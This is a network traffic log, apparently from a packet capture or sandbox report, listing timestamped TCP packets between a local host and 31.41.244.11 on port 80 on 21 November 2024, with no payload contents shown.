                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.122356892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.122412920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.122459888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.122507095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.123133898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.123187065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.123214960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.123260021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.124170065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.124227047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.124285936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.124335051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.125286102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.125349998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.125361919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.125411034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.126471996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.126532078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.126565933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.126616001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.127460003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.127511024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.127552032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.127600908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.128587008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.128643990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.128669024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.128719091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.129622936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.129678965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.129740953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.129790068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.130702019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.130759001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.130837917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.130892038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.131802082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.131858110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.131905079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.131953955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.132886887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.132940054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.133001089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.133054018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.133966923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.134027958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.134089947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.134135962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.135059118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.135108948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.135188103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.135241032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.136174917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.136240959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.136464119 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.136518002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.137330055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.137388945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.137430906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.137485981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.138341904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.138392925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.138436079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.138490915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.139444113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.139498949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.139548063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.139599085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.140516043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.140572071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.140594959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.140623093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.141613007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.141669035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.141717911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.141768932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.142693996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.142751932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.142819881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.142869949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.143786907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.143842936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.143893957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.143944979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.144886017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.144941092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.145128012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.145181894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.146198034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.146255016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.146374941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.146426916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.147089958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.147152901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.147221088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.147274971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.148158073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.148220062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.148256063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.148308039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.149308920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.149377108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.149458885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.149511099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.150330067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.150382042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.150506973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.150557041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.151421070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.151490927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.151542902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.151592016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.152510881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.152574062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.152638912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.152688980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.153611898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.153667927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.153867006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.153924942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.154705048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.154758930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.154835939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.154886961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.155714989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.155769110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.307910919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.307954073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.308028936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.308423042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.308485985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.308520079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.308520079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.308541059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.309520006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.309566975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.309607983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.309653044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.310597897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.310642004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.310710907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.310755014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.311742067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.311794996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.311903954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.311950922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.312844038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.312889099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.312939882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.312985897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.313997030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.314040899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.314119101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.314160109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.314949989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.314995050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.315037012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.315080881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.316081047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.316128016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.316219091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.316268921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.317140102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.317210913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.317266941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.317310095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.318221092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.318265915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.318351030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.318394899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.319366932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.319413900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.319469929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.319515944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.320444107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.320499897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.320574999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.320626020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.321701050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.321755886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.321822882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.321875095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.322839975 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.322890997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.322932959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.322982073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.323745966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.323795080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.323880911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.323930025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.324875116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.324925900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.324965000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.325011969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.325917959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.325968981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.326030970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.326076984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.326996088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.327053070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.327092886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.327147007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.328078032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.328134060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.328227997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.328283072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.329183102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.329238892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.329292059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.329345942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.330229998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.330286026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.330349922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.330400944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.331404924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.331470013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.331501961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.331548929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.332418919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.332470894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.332546949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.332600117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.333503962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.333558083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.333596945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.333643913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.334599018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.334646940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.334661961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.334707975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.335678101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.335726023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.335767031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.335808039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.336875916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.336931944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.336946011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.336987972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.337857962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.337909937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.337990046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.338035107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.338953018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.338979959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.339003086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.339020967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.340092897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.340138912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.340181112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.340226889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.341128111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.341176987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.341223001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.341269016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.342206955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.342257977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.342293024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.342345953 CET4977080192.168.2.431.41.244.11
